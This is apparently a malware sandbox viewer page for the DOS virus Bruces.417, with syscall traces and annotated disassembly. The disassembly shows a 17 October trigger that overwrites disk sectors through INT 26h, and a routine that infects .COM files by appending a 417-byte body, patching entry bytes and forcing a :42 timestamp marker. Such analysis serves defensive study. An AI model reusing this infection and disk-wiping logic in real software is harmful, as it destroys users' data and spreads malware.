Sample viewer

vx.netlux.org/Virus.DOS.Bruces.417


Syscalls:

Time Syscall Op Syscall Name
; Excerpt following the DOS "Get date" call (INT 21h AH=2Ah returns DH = month, DL = day).
; Date trigger: on 17 October the code enters an INT 26h sector-overwrite loop; on any other date it skips to 0x12b60.
2018-12-17T22:13:26.06981486Z 42 PC: 12b43 | Get date 0x12b43: cmp dh, 0xa  ; month == 10 (October)?
0x12b46: jne 0x12b60  ; no: skip the payload
0x12b48: cmp dl, 0x11  ; day == 17?
0x12b4b: jne 0x12b60  ; no: skip the payload
0x12b4d: mov al, 2  ; INT 26h drive number, 2 = C:
0x12b4f: mov cx, 1  ; one sector per call
0x12b52: lea bx, word ptr [bp + 0x223]  ; DS:BX = source buffer (contents not shown in this trace)
0x12b56: cdq  ; one-byte opcode in 16-bit code, so effectively CWD (DX = sign of AX); presumably DX = 0, the first sector - confirm
0x12b57: int 0x26  ; DOS absolute disk write: AL = drive, CX = sector count, DX = start sector
0x12b59: inc dx  ; next sector; INC leaves CF as INT 26h returned it
0x12b5a: jae 0x12b57  ; CF clear (write succeeded): keep overwriting
0x12b5c: inc al  ; write failed: move on to the next drive
0x12b5e: jmp 0x12b4f  ; no exit from this loop is visible in the excerpt
0x12b60: mov di, 0x100  ; 0x100 = start offset of a .COM image
0x12b63: lea si, word ptr [bp + 0x2a1]  ; presumably the host's saved first three bytes - confirm
0x12b67: movsw word ptr es:[di], word ptr [si]  ; copy bytes 1-2 to es:0x100
0x12b68: movsb byte ptr es:[di], byte ptr [si]  ; copy byte 3
0x12b69: lea dx, word ptr [bp + 0x2a4]  ; DX = buffer handed to the routine below
0x12b6d: call 0x12c14  ; the next logged call is "Set disk transfer address" (PC 12c18), so bp+0x2a4 becomes the DTA
0x12b70: lea dx, word ptr [bp + 0x298]  ; argument for the "Find first file" logged next (likely the search pattern)
2018-12-17T22:13:26.07236114Z 26 PC: 12c18 | Set disk transfer address
2018-12-17T22:13:26.07346842Z 78 PC: 12b7b | Find first file
2018-12-17T22:13:26.079199899Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.096255585Z 61 PC: 12ba2 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:13:26.107193507Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.113803732Z 66 PC: 12bb6 | Move file pointer
; Excerpt: tail of the per-file infection sequence, starting at the return from DOS "Get time" (INT 21h AH=2Ch).
; Offsets bp+0x2ba / 0x2bc / 0x2c2 are the time, date and name fields of the find-first DTA set at bp+0x2a4 earlier in the trace.
2018-12-17T22:13:26.116110923Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1  ; repeat the Get time request while ZF is set (flag source not visible here)
0x12bc7: mov word ptr [bp + 0x11e], dx  ; keep DX from Get time (DH = seconds, DL = hundredths); use not shown, possibly a per-copy key - confirm
0x12bcb: call 0x22b02  ; next logged call is the 417-byte write at PC 12b10; target is probably 0x12b02 with the 16-bit offset left unwrapped - confirm
0x12bce: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: DX = 0 when AX is non-negative
0x12bcf: xor cx, cx  ; CX:DX = file offset, high word 0
0x12bd1: mov ax, 0x4200  ; AH=42h move file pointer, AL=0 relative to start of file
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]  ; 3-byte buffer; presumably the replacement entry bytes for the host - confirm
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40  ; AH=40h write CX bytes from DS:DX to handle BX
0x12bdf: int 0x21  ; logged as "Write 3 bytes on handle 5"
0x12be1: mov dx, word ptr [bp + 0x2bc]  ; date word from the DTA (offset 18h)
0x12be5: mov cx, word ptr [bp + 0x2ba]  ; time word from the DTA (offset 16h)
0x12be9: and cl, 0xe0  ; clear the 5-bit seconds/2 field
0x12bec: or cl, 0x15  ; seconds/2 = 21, so the stamp always reads :42 seconds
0x12bef: mov ax, 0x5701  ; AH=57h AL=1: set file date and time
0x12bf2: int 0x21  ; date and hh:mm restored, seconds forced to 42: an indicator on files this code touched
0x12bf4: mov ah, 0x3e  ; AH=3Eh close handle
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]  ; DTA offset 1Eh = found file name, for the attribute call logged at PC 12c07
2018-12-17T22:13:26.11871542Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.126564181Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.128179222Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.134728596Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.135935417Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.14342109Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.153519144Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.158330162Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.168315465Z 61 PC: 12ba2 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:13:26.175662977Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.182288067Z 66 PC: 12bb6 | Move file pointer
; Excerpt: tail of the per-file infection sequence, starting at the return from DOS "Get time" (INT 21h AH=2Ch).
; Offsets bp+0x2ba / 0x2bc / 0x2c2 are the time, date and name fields of the find-first DTA set at bp+0x2a4 earlier in the trace.
2018-12-17T22:13:26.18355945Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1  ; repeat the Get time request while ZF is set (flag source not visible here)
0x12bc7: mov word ptr [bp + 0x11e], dx  ; keep DX from Get time (DH = seconds, DL = hundredths); use not shown, possibly a per-copy key - confirm
0x12bcb: call 0x22b02  ; next logged call is the 417-byte write at PC 12b10; target is probably 0x12b02 with the 16-bit offset left unwrapped - confirm
0x12bce: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: DX = 0 when AX is non-negative
0x12bcf: xor cx, cx  ; CX:DX = file offset, high word 0
0x12bd1: mov ax, 0x4200  ; AH=42h move file pointer, AL=0 relative to start of file
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]  ; 3-byte buffer; presumably the replacement entry bytes for the host - confirm
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40  ; AH=40h write CX bytes from DS:DX to handle BX
0x12bdf: int 0x21  ; logged as "Write 3 bytes on handle 5"
0x12be1: mov dx, word ptr [bp + 0x2bc]  ; date word from the DTA (offset 18h)
0x12be5: mov cx, word ptr [bp + 0x2ba]  ; time word from the DTA (offset 16h)
0x12be9: and cl, 0xe0  ; clear the 5-bit seconds/2 field
0x12bec: or cl, 0x15  ; seconds/2 = 21, so the stamp always reads :42 seconds
0x12bef: mov ax, 0x5701  ; AH=57h AL=1: set file date and time
0x12bf2: int 0x21  ; date and hh:mm restored, seconds forced to 42: an indicator on files this code touched
0x12bf4: mov ah, 0x3e  ; AH=3Eh close handle
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]  ; DTA offset 1Eh = found file name, for the attribute call logged at PC 12c07
2018-12-17T22:13:26.186803665Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.189579139Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.190892005Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.194054752Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.195823551Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.203167512Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.213726859Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.216501368Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.225926912Z 61 PC: 12ba2 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:13:26.232962252Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.239194917Z 66 PC: 12bb6 | Move file pointer
; Excerpt: tail of the per-file infection sequence, starting at the return from DOS "Get time" (INT 21h AH=2Ch).
; Offsets bp+0x2ba / 0x2bc / 0x2c2 are the time, date and name fields of the find-first DTA set at bp+0x2a4 earlier in the trace.
2018-12-17T22:13:26.240575116Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1  ; repeat the Get time request while ZF is set (flag source not visible here)
0x12bc7: mov word ptr [bp + 0x11e], dx  ; keep DX from Get time (DH = seconds, DL = hundredths); use not shown, possibly a per-copy key - confirm
0x12bcb: call 0x22b02  ; next logged call is the 417-byte write at PC 12b10; target is probably 0x12b02 with the 16-bit offset left unwrapped - confirm
0x12bce: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: DX = 0 when AX is non-negative
0x12bcf: xor cx, cx  ; CX:DX = file offset, high word 0
0x12bd1: mov ax, 0x4200  ; AH=42h move file pointer, AL=0 relative to start of file
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]  ; 3-byte buffer; presumably the replacement entry bytes for the host - confirm
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40  ; AH=40h write CX bytes from DS:DX to handle BX
0x12bdf: int 0x21  ; logged as "Write 3 bytes on handle 5"
0x12be1: mov dx, word ptr [bp + 0x2bc]  ; date word from the DTA (offset 18h)
0x12be5: mov cx, word ptr [bp + 0x2ba]  ; time word from the DTA (offset 16h)
0x12be9: and cl, 0xe0  ; clear the 5-bit seconds/2 field
0x12bec: or cl, 0x15  ; seconds/2 = 21, so the stamp always reads :42 seconds
0x12bef: mov ax, 0x5701  ; AH=57h AL=1: set file date and time
0x12bf2: int 0x21  ; date and hh:mm restored, seconds forced to 42: an indicator on files this code touched
0x12bf4: mov ah, 0x3e  ; AH=3Eh close handle
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]  ; DTA offset 1Eh = found file name, for the attribute call logged at PC 12c07
2018-12-17T22:13:26.243257995Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.246842324Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.248173234Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.251688013Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.253280023Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.260386658Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.270064469Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.272683116Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.282011098Z 61 PC: 12ba2 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:13:26.288510325Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.294802426Z 66 PC: 12bb6 | Move file pointer
; Excerpt: tail of the per-file infection sequence, starting at the return from DOS "Get time" (INT 21h AH=2Ch).
; Offsets bp+0x2ba / 0x2bc / 0x2c2 are the time, date and name fields of the find-first DTA set at bp+0x2a4 earlier in the trace.
2018-12-17T22:13:26.29608528Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1  ; repeat the Get time request while ZF is set (flag source not visible here)
0x12bc7: mov word ptr [bp + 0x11e], dx  ; keep DX from Get time (DH = seconds, DL = hundredths); use not shown, possibly a per-copy key - confirm
0x12bcb: call 0x22b02  ; next logged call is the 417-byte write at PC 12b10; target is probably 0x12b02 with the 16-bit offset left unwrapped - confirm
0x12bce: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: DX = 0 when AX is non-negative
0x12bcf: xor cx, cx  ; CX:DX = file offset, high word 0
0x12bd1: mov ax, 0x4200  ; AH=42h move file pointer, AL=0 relative to start of file
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]  ; 3-byte buffer; presumably the replacement entry bytes for the host - confirm
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40  ; AH=40h write CX bytes from DS:DX to handle BX
0x12bdf: int 0x21  ; logged as "Write 3 bytes on handle 5"
0x12be1: mov dx, word ptr [bp + 0x2bc]  ; date word from the DTA (offset 18h)
0x12be5: mov cx, word ptr [bp + 0x2ba]  ; time word from the DTA (offset 16h)
0x12be9: and cl, 0xe0  ; clear the 5-bit seconds/2 field
0x12bec: or cl, 0x15  ; seconds/2 = 21, so the stamp always reads :42 seconds
0x12bef: mov ax, 0x5701  ; AH=57h AL=1: set file date and time
0x12bf2: int 0x21  ; date and hh:mm restored, seconds forced to 42: an indicator on files this code touched
0x12bf4: mov ah, 0x3e  ; AH=3Eh close handle
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]  ; DTA offset 1Eh = found file name, for the attribute call logged at PC 12c07
2018-12-17T22:13:26.298454811Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.301271853Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.302543723Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.304977176Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.306678852Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.314140982Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.32356092Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.326180158Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.336063903Z 61 PC: 12ba2 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:13:26.342328146Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.348423282Z 66 PC: 12bb6 | Move file pointer
; Excerpt: tail of the per-file infection sequence, starting at the return from DOS "Get time" (INT 21h AH=2Ch).
; Offsets bp+0x2ba / 0x2bc / 0x2c2 are the time, date and name fields of the find-first DTA set at bp+0x2a4 earlier in the trace.
2018-12-17T22:13:26.349662148Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1  ; repeat the Get time request while ZF is set (flag source not visible here)
0x12bc7: mov word ptr [bp + 0x11e], dx  ; keep DX from Get time (DH = seconds, DL = hundredths); use not shown, possibly a per-copy key - confirm
0x12bcb: call 0x22b02  ; next logged call is the 417-byte write at PC 12b10; target is probably 0x12b02 with the 16-bit offset left unwrapped - confirm
0x12bce: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: DX = 0 when AX is non-negative
0x12bcf: xor cx, cx  ; CX:DX = file offset, high word 0
0x12bd1: mov ax, 0x4200  ; AH=42h move file pointer, AL=0 relative to start of file
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]  ; 3-byte buffer; presumably the replacement entry bytes for the host - confirm
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40  ; AH=40h write CX bytes from DS:DX to handle BX
0x12bdf: int 0x21  ; logged as "Write 3 bytes on handle 5"
0x12be1: mov dx, word ptr [bp + 0x2bc]  ; date word from the DTA (offset 18h)
0x12be5: mov cx, word ptr [bp + 0x2ba]  ; time word from the DTA (offset 16h)
0x12be9: and cl, 0xe0  ; clear the 5-bit seconds/2 field
0x12bec: or cl, 0x15  ; seconds/2 = 21, so the stamp always reads :42 seconds
0x12bef: mov ax, 0x5701  ; AH=57h AL=1: set file date and time
0x12bf2: int 0x21  ; date and hh:mm restored, seconds forced to 42: an indicator on files this code touched
0x12bf4: mov ah, 0x3e  ; AH=3Eh close handle
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]  ; DTA offset 1Eh = found file name, for the attribute call logged at PC 12c07
2018-12-17T22:13:26.351720998Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.354557804Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.355852714Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.358261671Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.359797978Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.366645891Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.379034373Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.381781611Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.391069668Z 61 PC: 12ba2 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:13:26.397218399Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.403464452Z 66 PC: 12bb6 | Move file pointer
; Excerpt: tail of the per-file infection sequence, starting at the return from DOS "Get time" (INT 21h AH=2Ch).
; Offsets bp+0x2ba / 0x2bc / 0x2c2 are the time, date and name fields of the find-first DTA set at bp+0x2a4 earlier in the trace.
2018-12-17T22:13:26.404680958Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1  ; repeat the Get time request while ZF is set (flag source not visible here)
0x12bc7: mov word ptr [bp + 0x11e], dx  ; keep DX from Get time (DH = seconds, DL = hundredths); use not shown, possibly a per-copy key - confirm
0x12bcb: call 0x22b02  ; next logged call is the 417-byte write at PC 12b10; target is probably 0x12b02 with the 16-bit offset left unwrapped - confirm
0x12bce: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: DX = 0 when AX is non-negative
0x12bcf: xor cx, cx  ; CX:DX = file offset, high word 0
0x12bd1: mov ax, 0x4200  ; AH=42h move file pointer, AL=0 relative to start of file
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]  ; 3-byte buffer; presumably the replacement entry bytes for the host - confirm
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40  ; AH=40h write CX bytes from DS:DX to handle BX
0x12bdf: int 0x21  ; logged as "Write 3 bytes on handle 5"
0x12be1: mov dx, word ptr [bp + 0x2bc]  ; date word from the DTA (offset 18h)
0x12be5: mov cx, word ptr [bp + 0x2ba]  ; time word from the DTA (offset 16h)
0x12be9: and cl, 0xe0  ; clear the 5-bit seconds/2 field
0x12bec: or cl, 0x15  ; seconds/2 = 21, so the stamp always reads :42 seconds
0x12bef: mov ax, 0x5701  ; AH=57h AL=1: set file date and time
0x12bf2: int 0x21  ; date and hh:mm restored, seconds forced to 42: an indicator on files this code touched
0x12bf4: mov ah, 0x3e  ; AH=3Eh close handle
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]  ; DTA offset 1Eh = found file name, for the attribute call logged at PC 12c07
2018-12-17T22:13:26.406753418Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.414723042Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.416024897Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.422133568Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.423575647Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.430995576Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.440641591Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.443054348Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.452135654Z 61 PC: 12ba2 | Open file (Filename = 'PAH.COM')
2018-12-17T22:13:26.458300711Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.464698527Z 66 PC: 12bb6 | Move file pointer
; Excerpt: tail of the per-file infection sequence, starting at the return from DOS "Get time" (INT 21h AH=2Ch).
; Offsets bp+0x2ba / 0x2bc / 0x2c2 are the time, date and name fields of the find-first DTA set at bp+0x2a4 earlier in the trace.
2018-12-17T22:13:26.465956919Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1  ; repeat the Get time request while ZF is set (flag source not visible here)
0x12bc7: mov word ptr [bp + 0x11e], dx  ; keep DX from Get time (DH = seconds, DL = hundredths); use not shown, possibly a per-copy key - confirm
0x12bcb: call 0x22b02  ; next logged call is the 417-byte write at PC 12b10; target is probably 0x12b02 with the 16-bit offset left unwrapped - confirm
0x12bce: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: DX = 0 when AX is non-negative
0x12bcf: xor cx, cx  ; CX:DX = file offset, high word 0
0x12bd1: mov ax, 0x4200  ; AH=42h move file pointer, AL=0 relative to start of file
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]  ; 3-byte buffer; presumably the replacement entry bytes for the host - confirm
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40  ; AH=40h write CX bytes from DS:DX to handle BX
0x12bdf: int 0x21  ; logged as "Write 3 bytes on handle 5"
0x12be1: mov dx, word ptr [bp + 0x2bc]  ; date word from the DTA (offset 18h)
0x12be5: mov cx, word ptr [bp + 0x2ba]  ; time word from the DTA (offset 16h)
0x12be9: and cl, 0xe0  ; clear the 5-bit seconds/2 field
0x12bec: or cl, 0x15  ; seconds/2 = 21, so the stamp always reads :42 seconds
0x12bef: mov ax, 0x5701  ; AH=57h AL=1: set file date and time
0x12bf2: int 0x21  ; date and hh:mm restored, seconds forced to 42: an indicator on files this code touched
0x12bf4: mov ah, 0x3e  ; AH=3Eh close handle
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]  ; DTA offset 1Eh = found file name, for the attribute call logged at PC 12c07
2018-12-17T22:13:26.46811184Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.471453676Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.472677407Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.475218826Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.477404922Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.484455863Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.493950812Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.497138948Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.506920036Z 61 PC: 12ba2 | Open file (Filename = 'TEST.COM')
2018-12-17T22:13:26.513293804Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.519576042Z 66 PC: 12bb6 | Move file pointer
; Excerpt: tail of the per-file infection sequence, starting at the return from DOS "Get time" (INT 21h AH=2Ch).
; Offsets bp+0x2ba / 0x2bc / 0x2c2 are the time, date and name fields of the find-first DTA set at bp+0x2a4 earlier in the trace.
2018-12-17T22:13:26.520760986Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1  ; repeat the Get time request while ZF is set (flag source not visible here)
0x12bc7: mov word ptr [bp + 0x11e], dx  ; keep DX from Get time (DH = seconds, DL = hundredths); use not shown, possibly a per-copy key - confirm
0x12bcb: call 0x22b02  ; next logged call is the 417-byte write at PC 12b10; target is probably 0x12b02 with the 16-bit offset left unwrapped - confirm
0x12bce: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: DX = 0 when AX is non-negative
0x12bcf: xor cx, cx  ; CX:DX = file offset, high word 0
0x12bd1: mov ax, 0x4200  ; AH=42h move file pointer, AL=0 relative to start of file
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]  ; 3-byte buffer; presumably the replacement entry bytes for the host - confirm
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40  ; AH=40h write CX bytes from DS:DX to handle BX
0x12bdf: int 0x21  ; logged as "Write 3 bytes on handle 5"
0x12be1: mov dx, word ptr [bp + 0x2bc]  ; date word from the DTA (offset 18h)
0x12be5: mov cx, word ptr [bp + 0x2ba]  ; time word from the DTA (offset 16h)
0x12be9: and cl, 0xe0  ; clear the 5-bit seconds/2 field
0x12bec: or cl, 0x15  ; seconds/2 = 21, so the stamp always reads :42 seconds
0x12bef: mov ax, 0x5701  ; AH=57h AL=1: set file date and time
0x12bf2: int 0x21  ; date and hh:mm restored, seconds forced to 42: an indicator on files this code touched
0x12bf4: mov ah, 0x3e  ; AH=3Eh close handle
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]  ; DTA offset 1Eh = found file name, for the attribute call logged at PC 12c07
2018-12-17T22:13:26.522233429Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.52793351Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.529015559Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.531661486Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.533439699Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.541055631Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.550986587Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.554387235Z 26 PC: 12c18 | Set disk transfer address
2018-12-17T22:13:26.555696202Z 9 PC: 12a47 | Display string (String= 'This is a dummy phile for the Spiritual Bruces virus 1.00!')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2609,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Excerpt following the DOS "Get date" call (INT 21h AH=2Ah returns DH = month, DL = day).
; Date trigger: on 17 October the code enters an INT 26h sector-overwrite loop; on any other date it skips to 0x12b60.
2018-12-25T11:46:05.924001114Z 42 PC: 12b43 | Get date 0x12b43: cmp dh, 0xa  ; month == 10 (October)?
0x12b46: jne 0x12b60  ; no: skip the payload
0x12b48: cmp dl, 0x11  ; day == 17?
0x12b4b: jne 0x12b60  ; no: skip the payload
0x12b4d: mov al, 2  ; INT 26h drive number, 2 = C:
0x12b4f: mov cx, 1  ; one sector per call
0x12b52: lea bx, word ptr [bp + 0x223]  ; DS:BX = source buffer (contents not shown in this trace)
0x12b56: cdq  ; one-byte opcode in 16-bit code, so effectively CWD (DX = sign of AX); presumably DX = 0, the first sector - confirm
0x12b57: int 0x26  ; DOS absolute disk write: AL = drive, CX = sector count, DX = start sector
0x12b59: inc dx  ; next sector; INC leaves CF as INT 26h returned it
0x12b5a: jae 0x12b57  ; CF clear (write succeeded): keep overwriting
0x12b5c: inc al  ; write failed: move on to the next drive
0x12b5e: jmp 0x12b4f  ; no exit from this loop is visible in the excerpt
0x12b60: mov di, 0x100  ; 0x100 = start offset of a .COM image
0x12b63: lea si, word ptr [bp + 0x2a1]  ; presumably the host's saved first three bytes - confirm
0x12b67: movsw word ptr es:[di], word ptr [si]  ; copy bytes 1-2 to es:0x100
0x12b68: movsb byte ptr es:[di], byte ptr [si]  ; copy byte 3
0x12b69: lea dx, word ptr [bp + 0x2a4]  ; DX = buffer handed to the routine below
0x12b6d: call 0x12c14  ; the next logged call is "Set disk transfer address" (PC 12c18), so bp+0x2a4 becomes the DTA
0x12b70: lea dx, word ptr [bp + 0x298]  ; argument for the "Find first file" logged next (likely the search pattern)
2018-12-25T11:46:05.926636397Z 26 PC: 12c18 | Set disk transfer address
2018-12-25T11:46:05.928421923Z 78 PC: 12b7b | Find first file
2018-12-25T11:46:05.936015047Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T11:46:06.123157996Z 61 PC: 12ba2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:06.132041187Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:06.139724136Z 66 PC: 12bb6 | Move file pointer
; Excerpt: tail of the per-file infection sequence, starting at the return from DOS "Get time" (INT 21h AH=2Ch).
; Offsets bp+0x2ba / 0x2bc / 0x2c2 are the time, date and name fields of the find-first DTA set at bp+0x2a4 earlier in the trace.
2018-12-25T11:46:06.142089401Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1  ; repeat the Get time request while ZF is set (flag source not visible here)
0x12bc7: mov word ptr [bp + 0x11e], dx  ; keep DX from Get time (DH = seconds, DL = hundredths); use not shown, possibly a per-copy key - confirm
0x12bcb: call 0x22b02  ; next logged call is the 417-byte write at PC 12b10; target is probably 0x12b02 with the 16-bit offset left unwrapped - confirm
0x12bce: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: DX = 0 when AX is non-negative
0x12bcf: xor cx, cx  ; CX:DX = file offset, high word 0
0x12bd1: mov ax, 0x4200  ; AH=42h move file pointer, AL=0 relative to start of file
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]  ; 3-byte buffer; presumably the replacement entry bytes for the host - confirm
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40  ; AH=40h write CX bytes from DS:DX to handle BX
0x12bdf: int 0x21  ; logged as "Write 3 bytes on handle 5"
0x12be1: mov dx, word ptr [bp + 0x2bc]  ; date word from the DTA (offset 18h)
0x12be5: mov cx, word ptr [bp + 0x2ba]  ; time word from the DTA (offset 16h)
0x12be9: and cl, 0xe0  ; clear the 5-bit seconds/2 field
0x12bec: or cl, 0x15  ; seconds/2 = 21, so the stamp always reads :42 seconds
0x12bef: mov ax, 0x5701  ; AH=57h AL=1: set file date and time
0x12bf2: int 0x21  ; date and hh:mm restored, seconds forced to 42: an indicator on files this code touched
0x12bf4: mov ah, 0x3e  ; AH=3Eh close handle
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]  ; DTA offset 1Eh = found file name, for the attribute call logged at PC 12c07
2018-12-25T11:46:06.146034698Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T11:46:06.157125435Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:46:06.159052639Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:06.168154325Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:46:06.170540416Z 62 PC: 12bf8 | Close file
